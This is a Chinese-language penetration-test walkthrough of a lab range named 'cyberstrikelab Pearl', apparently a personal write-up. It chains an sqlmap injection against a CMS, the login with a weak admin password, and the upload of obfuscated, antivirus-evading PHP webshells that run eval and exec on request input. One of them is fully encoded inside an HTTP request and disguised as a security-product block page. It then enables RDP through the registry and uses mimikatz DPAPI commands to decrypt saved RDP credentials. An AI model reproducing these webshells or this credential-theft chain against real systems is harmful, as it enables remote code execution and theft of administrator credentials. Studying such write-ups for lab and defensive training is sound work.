cyberstrikelab-Pearl

Oceanzbz

2025-06-01

攻防渗透

梦想cms sql注入 + 后台文件上传

1	sqlmap.py -u "[http://192.168.10.65/?m=Tags&name="](http://192.168.10.65/?m=Tags&name=") --technique=E --tamper=chardoubleencode -p name -D lmxcms --tables

注入出来之后密码是一个弱口令 admin admin123

修改为可以上传php文件,然后写一个免杀的木马

<?php
// 定义混淆函数m
function m($a, $b, $c) {
    return str_replace(str_split($a), str_split($b), $c);
}

// 定义字符串数组S，用来存储需要混淆的函数名
$S = array(
    m("ncoai", "msyte", "cocain"), 
    m("sir", "cex", "iris"),
    m("otab", "lshe", "taboo") . "_" . m("sir", "cex", "iris"),
    m("gbledin", "upasthr", "bleeding")
);

// 获取系统参数D
$TR = m("etroubl", "edisabl", "trouble");
$MK = m("dpreambl", "sfunctio", "preambled");
$D = explode(",", ini_get($TR . '_' . $MK));

// 获取请求参数P
$P = $_REQUEST;

foreach ($S as $A) {
    // 如果数组S中的某个元素不在数组D中
    if (!in_array($A, $D)) {
        // 根据不同的条件，执行对应的操作
        if ($A == m("ncoai", "msyte", "cocain")) {
            // 调用传递的命令
            if (isset($P['lol'])) {
                eval($P['lol']); // 执行传入的PHP代码
            }
        } elseif ($A == m("sir", "cex", "iris")) {
            // 执行命令并输出结果
            exec($P['lol'] . " 2>&1", $arr);
            echo join("\n", $arr) . "\n";
        } else {
            // 默认处理
            if (isset($P['lol'])) {
                eval($P['lol']);
            }
        }
        // 执行完毕后退出
        exit;
    }
}
?>

构造上传

POST /admin.php?m=Template&a=editfile&dir= HTTP/1.1
Host: 192.168.10.65
Content-Length: 8375
Cache-Control: max-age=0
Origin: http://192.168.10.65
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.10.65/admin.php?m=Template&a=editfile&dir=default/error.html
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=f5lufa5cvplm7povphb842p643
Connection: keep-alive

settemcontent=1&filename=4.php&temcontent=%3C%3Fphp+%2F*%3Cmeta+name%3D%222v2wd8%22+content%3D%22qa9y1S5k%22%3E*%2F%0D%0A%24password%3D%27UUdWMqa9y1S5kllqa9y1S5kXqa9y1S5kd29KRjlRVDFOVVcyTnRaRjBwT3c9PQ%3D%3D%27%3B%0D%0A%24username+%3D+get_meta_tags%28__FILE__%29%5B%24_GET%5B%27token%27%5D%5D%3B%0D%0Aheader%28%22ddddddd%3A%22.%24username%29%3B%0D%0A%24arr+%3D+apache_response_headers%28%29%3B%0D%0A%24template_source%3D%27%27%3B%0D%0Aforeach+%28%24arr+as+%24k+%3D%3E+%24v%29+%7B%0D%0A++++if+%28%24k%5B0%5D+%3D%3D+%27d%27+%26%26+%24k%5B5%5D+%3D%3D+%27d%27%29+%7B%0D%0A++++++++%24template_source+%3D+str_replace%28%24v%2C%27%27%2C%24password%29%3B%0D%0A++++%7D%7D%0D%0A%24template_source+%3D+base64_decode%28%24template_source%29%3B%0D%0A%24template_source+%3D+base64_decode%28%24template_source%29%3B%0D%0A%24key+%3D+%27template_source%27%3B%0D%0A%24aes_decode%5B1%5D%3D%24%24key%3B%0D%0A%40eval%28%24aes_decode%5B1%5D%29%3B%0D%0A%24yBoZ6A+%3D+%22PCFET0NUWVBFIGh0bWw%2BCjxodG1sPgoJPGhlYWQ%2BCgkJPG1ldGEgY2hhcnNldD0idXRmLTgiPgoJCTx0aXRsZT7mi6bmiKrpobXpnaI8L3RpdGxlPgoJCTxzdHlsZSB0eXBlPSJ0ZXh0L2NzcyI%2BCgkJCWJvZHl7CgkJCQl3aWR0aDogMTAwJTsKCQkJCXBhZGRpbmc6IDA7CgkJCQltYXJnaW46IDA7CgkJCX0KCQkJI21heHsKCQkJCXdpZHRoOiAxMDAlOwoJCQkJcGFkZGluZzogMDsKCQkJCW1hcmdpbjogMCBhdXRvOwoJCQl9CgkJCSN0b3B7CgkJCQl3aWR0aDogMTUwcHg7CgkJCQltYXJnaW46IDAgYXV0bzsKCQkJCXBhZGRpbmctdG9wOiA2MHB4OwoJCQl9CgkJCSN3YXJtewoJCQkJbWFyZ2luOiAyMHB4IDAgMTVweCAwOwoJCQkJZm9udC1zaXplOiAyNHB4OwoJCQkJY29sb3I6ICM2MDYyNjY7CgkJCQl0ZXh0LWFsaWduOiBjZW50ZXI7CgkJCX0KCQkJI3RpcHsKCQkJCXdpZHRoOiA4MDBweDsKCQkJCW1hcmdpbjogMCBhdXRvOwoJCQkJcGFkZGluZy10b3A6IDEwcHg7CgkJCQlwYWRkaW5nLWJvdHRvbTogMjBweDsKCQkJCWJvcmRlcjogI0RGREZERiBzb2xpZCAxcHg7CgkJCQlib3JkZXItcmFkaXVzOiA2cHg7CgkJCQljb2xvcjogIzgwODI4ODsKCQkJCWZvbnQtc2l6ZTogMTZweDsKCQkJfQoJCQlwewoJCQkJcGFkZGluZy1sZWZ0OiAyMDBweDsKCQkJfQoJCQkjZXhhbXBsZXsKCQkJCW1hcmdpbi1sZWZ0OiA1NXB4OwoJCQl9CgkJCSNib217CgkJCQl3aWR0aDogOTAwcHg7CgkJCQltYXJnaW46IDAgYXV0bzsKCQkJCW1hcmdpbi10b3A6IDVweDsKCQkJCWZvbnQtc2l6ZTogMTZweDsKCQkJfQoJCQkjbGVmdHsKCQkJCWZsb2F0OiBsZWZ0OwoJCQkJd2lkdGg6IDMwcHg7CgkJCQlwYWRkaW5nLWxlZnQ6IDE2MHB4OwoJCQkJbWFyZ2luLXRvcDogMTBweDsKCQkJfQoJCQkjcmlnaHR7CgkJCQlmbG9hdDogbGVmdDsKCQkJCW1hcmdpbi10b3A6IDEwcHg7CgkJCQltYXJnaW4tbGVmdDogOHB4OwoJCQkJY29sb3I6ICM4MDgyODg7CgkJCX0KCQkJaW5wdXR7CgkJCQl3aWR0aDogMTAwcHg7CgkJCQloZWlnaHQ6IDM1cHg7CgkJCQlib3JkZXI6ICNERkRGREYgc29saWQgMXB4OwoJCQkJYm9yZGVyLXJhZGl1czogNHB4OwoJCQkJbWFyZ2luLWxlZnQ6IDVweDsKCQkJCW91dGxpbmU6IG5vbmU7CgkJCX0KCQkJI2RldGFpbHsKCQkJCWJhY2tncm91bmQtY29sb3I6ICMyZWExZjg7CgkJCQljb2xvcjogI0ZGRkZGRjsKCQkJfQoJCQkjZmVlZGJhY2t7CgkJCQliYWNrZ3JvdW5kLWNvbG9yOiAjRkZGRkZGOwoJCQkJY29sb3I6ICM4MDgyODg7CgkJCX0KCQkJZm9vdGVyewoJCQkJd2lkdGg6IDEwMCU7CgkJCQlwb3NpdGlvbjogYWJzb2x1dGU7CgkJCQlib3R0b206IDBweDsKCQkJCXBhZGRpbmc6IDI1cHggMCAzNXB4IDA7CgkJCQltYXJnaW46IDAgYXV0bzsKCQkJCXRleHQtYWxpZ246IGNlbnRlcjsKCQkJCWNvbG9yOiAjODA4Mjg4OwoJCQkJZm9udC1zaXplOiAxNHB4OwoJCQkJYm9yZGVyLXRvcDogMXB4IHNvbGlkICNlNGU3ZWQ7CgkJCX0KCQk8L3N0eWxlPgoJCQoJPC9oZWFkPgoJPGJvZHk%2BCgkJPGRpdiBpZD0ibWF4Ij4KCQkJPGRpdiBpZD0idG9wIj4KCQkJCTxzdmcgeG1sbnM9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiBpZD0i5Zu%2B5bGCXzEiIHN0eWxlPSIiIHZpZXdCb3g9IjAgMCA5MyA2MCIgeD0iMHB4IiB5PSIwcHgiIHhtbG5zOnhtbD0iaHR0cDovL3d3dy53My5vcmcvWE1MLzE5OTgvbmFtZXNwYWNlIiB4bWw6c3BhY2U9InByZXNlcnZlIiB2ZXJzaW9uPSIxLjEiPgoJCQkJPHN0eWxlIHR5cGU9InRleHQvY3NzIj4KCQkJCQkuc3Qwe2ZpbGw6IzI3QTFGRDt9CgkJCQkJLnN0MXtmaWxsOiM0NzQ3NTU7fQoJCQkJCS5zdDJ7ZmlsbDojRkZGRkZGO30KCQkJCQkuc3Qze2ZpbGw6IzcxQzFGRTt9CgkJCQk8L3N0eWxlPgoJCQkJPGc%2BCgkJCQkJPHBhdGggY2xhc3M9InN0MCIgZD0iTSA3MyAxOCBIIDMxIGMgLTIuMiAwIC00IC0xLjggLTQgLTQgViA0IGMgMCAtMi4yIDEuOCAtNCA0IC00IGggNDIgYyAyLjIgMCA0IDEuOCA0IDQgdiAxMCBDIDc3IDE2LjIgNzUuMiAxOCA3MyAxOCBaIiAvPgoJCQkJCTxwYXRoIGNsYXNzPSJzdDEiIGQ9Ik0gMjEgMTggSCA0IGMgLTIuMiAwIC00IC0xLjggLTQgLTQgViA0IGMgMCAtMi4yIDEuOCAtNCA0IC00IGggMTcgYyAyLjIgMCA0IDEuOCA0IDQgdiAxMCBDIDI1IDE2LjIgMjMuMiAxOCAyMSAxOCBaIiAvPgoJCQkJCTxwYXRoIGNsYXNzPSJzdDAiIGQ9Ik0gNzMgNTggSCAzMSBjIC0yLjIgMCAtNCAtMS44IC00IC00IFYgNDQgYyAwIC0yLjIgMS44IC00IDQgLTQgaCA0MiBjIDIuMiAwIDQgMS44IDQgNCB2IDEwIEMgNzcgNTYuMiA3NS4yIDU4IDczIDU4IFoiIC8%2BCgkJCQkJPHBhdGggY2xhc3M9InN0MSIgZD0iTSAyMSA1OCBIIDQgYyAtMi4yIDAgLTQgLTEuOCAtNCAtNCBWIDQ0IGMgMCAtMi4yIDEuOCAtNCA0IC00IGggMTcgYyAyLjIgMCA0IDEuOCA0IDQgdiAxMCBDIDI1IDU2LjIgMjMuMiA1OCAyMSA1OCBaIiAvPgoJCQkJCTxwYXRoIGNsYXNzPSJzdDAiIGQ9Ik0gNDYgMzggSCA0IGMgLTIuMiAwIC00IC0xLjggLTQgLTQgViAyNCBjIDAgLTIuMiAxLjggLTQgNCAtNCBoIDQyIGMgMi4yIDAgNCAxLjggNCA0IHYgMTAgQyA1MCAzNi4yIDQ4LjIgMzggNDYgMzggWiIgLz4KCQkJCQk8cGF0aCBjbGFzcz0ic3QxIiBkPSJNIDczIDM4IEggNTYgYyAtMi4yIDAgLTQgLTEuOCAtNCAtNCBWIDI0IGMgMCAtMi4yIDEuOCAtNCA0IC00IGggMTcgYyAyLjIgMCA0IDEuOCA0IDQgdiAxMCBDIDc3IDM2LjIgNzUuMiAzOCA3MyAzOCBaIiAvPgoJCQkJCTxjaXJjbGUgY2xhc3M9InN0MiIgY3g9IjczIiBjeT0iNDAiIHI9IjIwIiAvPgoJCQkJCTxnPgoJCQkJCQk8cGF0aCBjbGFzcz0ic3QzIiBkPSJNIDczIDIyIGMgOS45IDAgMTggOC4xIDE4IDE4IHMgLTguMSAxOCAtMTggMTggcyAtMTggLTguMSAtMTggLTE4IFMgNjMuMSAyMiA3MyAyMiBNIDczIDIwIGMgLTExIDAgLTIwIDkgLTIwIDIwIHMgOSAyMCAyMCAyMCBzIDIwIC05IDIwIC0yMCBTIDg0IDIwIDczIDIwIEwgNzMgMjAgWiIgLz4KCQkJCQk8L2c%2BCgkJCQkJPHBhdGggY2xhc3M9InN0MyIgZD0iTSA4MyA0MiBIIDYzIGMgLTEuMSAwIC0yIC0wLjkgLTIgLTIgdiAwIGMgMCAtMS4xIDAuOSAtMiAyIC0yIGggMjAgYyAxLjEgMCAyIDAuOSAyIDIgdiAwIEMgODUgNDEuMSA4NC4xIDQyIDgzIDQyIFoiIC8%2BCgkJCQk8L2c%2BCgkJCQk8L3N2Zz4KCQkJPC9kaXY%2BCgkJCQkJCTxkaXYgaWQ9Im1pZCI%2BCgkJCQk8ZGl2IGlkPSJ3YXJtIj4KCQkJCQk8c3Bhbj48Yj7mgqjnmoTor7fmsYLluKbmnInkuI3lkIjms5Xlj4LmlbDvvIzlt7LooqvnvZHnq5nnrqHnkIblkZjorr7nva7mi6bmiKrvvIE8L2I%2BPC9zcGFuPgoJCQkJPC9kaXY%2BCgkJCQk8ZGl2IGlkPSJ0aXAiPgoJCQkJCTxwPuWPr%2BiDveWOn%2BWboO%2B8muaCqOaPkOS6pOeahOWGheWuueWMheWQq%2BWNsemZqeeahOaUu%2BWHu%2Bivt%2BaxgjwvcD4KCQkJCQk8cD7lpoLkvZXop6PlhrPvvJo8L3A%2BCgkJCQkJPGRpdiBpZD0iZXhhbXBsZSI%2BCgkJCQkJCTxwPjHvvInmo4Dmn6Xmj5DkuqTlhoXlrrnvvJs8L3A%2BCgkJCQkJCTxwPjLvvInlpoLnvZHnq5nmiZjnrqHvvIzor7fogZTns7vnqbrpl7Tmj5DkvpvllYbvvJs8L3A%2BCgkJCQkJCTxwPjPvvInmma7pgJrnvZHnq5norr%2FlrqLvvIzor7fogZTns7vnvZHnq5nnrqHnkIblkZg8L3A%2BCgkJCQkJPC9kaXY%2BCgkJCQk8L2Rpdj4KCQkJPC9kaXY%2BCgkJCTxkaXYgaWQ9ImJvbSI%2BCgkJCQk8ZGl2IGlkPSJsZWZ0Ij4KCQkJCQk8c3ZnIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgaWQ9IuWbvuWxgl8xIiBzdHlsZT0iIiB2aWV3Qm94PSIwIDAgMzAgMzAiIHg9IjBweCIgeT0iMHB4IiB4bWxuczp4bWw9Imh0dHA6Ly93d3cudzMub3JnL1hNTC8xOTk4L25hbWVzcGFjZSIgeG1sOnNwYWNlPSJwcmVzZXJ2ZSIgdmVyc2lvbj0iMS4xIj4KCQkJCQk8c3R5bGUgdHlwZT0idGV4dC9jc3MiPgoJCQkJCQkuc3Q0e2ZpbGw6I0RGREZERjt9CgkJCQkJCS5zdDV7ZmlsbDojMDQ1OEIwO30KCQkJCQkJLnN0NntmaWxsOiNFREU3RTY7fQoJCQkJCQkuc3Q3e2ZpbGw6I0Y3RURFQjt9CgkJCQkJCS5zdDh7ZmlsbDojM0I0NTVGO30KCQkJCQk8L3N0eWxlPgoJCQkJCTxnPgoJCQkJCQk8Y2lyY2xlIGNsYXNzPSJzdDQiIGN4PSIxNSIgY3k9IjE1IiByPSIxNSIgLz4KCQkJCQkJPGVsbGlwc2UgY2xhc3M9InN0NSIgY3g9IjE1IiBjeT0iMjMuNSIgcng9IjEyLjQiIHJ5PSI2LjUiIC8%2BCgkJCQkJCTxwYXRoIGNsYXNzPSJzdDYiIGQ9Ik0gMTUgMjIgTCAxNSAyMiBjIC0yLjIgMCAtNCAtMS44IC00IC00IHYgLTMgYyAwIC0yLjIgMS44IC00IDQgLTQgaCAwIGMgMi4yIDAgNCAxLjggNCA0IHYgMyBDIDE5IDIwLjIgMTcuMiAyMiAxNSAyMiBaIiAvPgoJCQkJCQk8ZWxsaXBzZSBjbGFzcz0ic3Q3IiBjeD0iMTUiIGN5PSIxMC41IiByeD0iNSIgcnk9IjcuNSIgLz4KCQkJCQkJPHBvbHlnb24gY2xhc3M9InN0OCIgcG9pbnRzPSIxMSw2IDEzLDggMTksOCAyMCwxMSAyMSwxMSAyMSw1IDE4LDIgMTIsMiA5LDUgOSwxMSAxMCwxMSIgLz4KCQkJCQkJPHBhdGggY2xhc3M9InN0NyIgZD0iTSAxOS41IDEzIGggLTkgQyA5LjcgMTMgOSAxMi4zIDkgMTEuNSB2IDAgYyAwIC0wLjggMC43IC0xLjUgMS41IC0xLjUgaCA5IGMgMC44IDAgMS41IDAuNyAxLjUgMS41IHYgMCBDIDIxIDEyLjMgMjAuMyAxMyAxOS41IDEzIFoiIC8%2BCgkJCQkJPC9nPgoJCQkJCTwvc3ZnPgoJCQkJPC9kaXY%2BCgkJCQk8ZGl2IGlkPSJyaWdodCI%2BCgkJCQkJPHNwYW4%2B5aaC5p6c5oKo5piv572R56uZ566h55CG5ZGY77yM6K%2B355m75b2V5a6J5YWo54uXPC9zcGFuPgoJCQkJCTxhIGhyZWY9Imh0dHA6Ly93d3cuc2FmZWRvZy5jbiI%2BPGlucHV0IHR5cGU9ImJ1dHRvbiIgbmFtZT0iZGV0YWlsIiBpZD0iZGV0YWlsIiB2YWx1ZT0i5p%2Bl55yL6K%2Bm5oOFIj48L2E%2BCgkJCQkJPHNwYW4%2B5oiWPC9zcGFuPgoJCQkJCTxhIGhyZWY9Imh0dHA6Ly9zZWN1cml0eS5zYWZlZG9nLmNuL2luZGV4Lmh0bWwiPjxpbnB1dCB0eXBlPSJidXR0b24iIG5hbWU9ImZlZWRiYWNrIiBpZD0iZmVlZGJhY2siIHZhbHVlPSLlj43ppojor6%2FmiqUiPjwvYT4KCQkJCTwvZGl2PgoJCQk8L2Rpdj4KCQkJPGRpdiBpZD0iZm9vdGVyIj4KCQkJCTxmb290ZXI%2BQ29weXJpZ2h0JiN4YTk7MjAxMy0yMDIwIOWOpumXqOacjeS6keS%2FoeaBr%2BenkeaKgOaciemZkOWFrOWPuCBBTEwgUmlnaHRzIFJlc2VydmVkIHwg6Ze9SUNQ5aSHMTQwMTQxMznlj7ctMTwvZm9vdGVyPgoJCQk8L2Rpdj4KCQk8L2Rpdj4KCTwvYm9keT4KPC9odG1sPg%3D%3D%22%3B%0D%0Aif%28+count%28%24_REQUEST%29+%7C%7C+file_get_contents%28%22php%3A%2F%2Finput%22%29+%29%7B%0D%0A%0D%0A%7Delse%7B%0D%0A++++header%28%27Content-Type%3Atext%2Fhtml%3Bcharset%3Dutf-8%27%29%3B++++http_response_code%28200%29%3B%0D%0A++++echo+base64_decode%2F**%2F%28%24yBoZ6A%29%3B%0D%0A%7D

先上线到cs然后去翻翻配置文件什么的

内网渗透

还是和之前一样添加后门用户rdp上去关防火墙

1	shell REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

fscan大法扫出了一个sql弱口令

登录发现不行

RDP远程桌面密码凭证获取

发现c盘有一个rdp连接，利用mimikatz去破解下密码

查看当前主机保存的RDP凭据

1	cmdkey /list

查找本地的Cred

1	dir /a %userprofile%\appdata\local\microsoft\credentials\*

获取到guidmasterkey

1	mimikatz.exe dpapi::cred /in:C:\Windows\system32\config\systemprofile\appdata\local\microsoft\credentials\F7A11901B817E047275D06BDB5BAF712

然后用这个找到masterkey

1	mimikatz.exe sekurlsa::dpapi

最后使用masterkey来解密凭证文件，得到administrator用户密码

mimikatz.exe "dpapi::cred /in:C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Credentials\F7A11901B817E047275D06BDB5BAF712 /masterkey:d66ec675b7789d8c929b9d887b63b8cdcdb0607b0ef6af226865964125c83e31608db9a7495a126ed80f04f854a4ff3c1393da53fe64e1080b2b10e2d933ee38"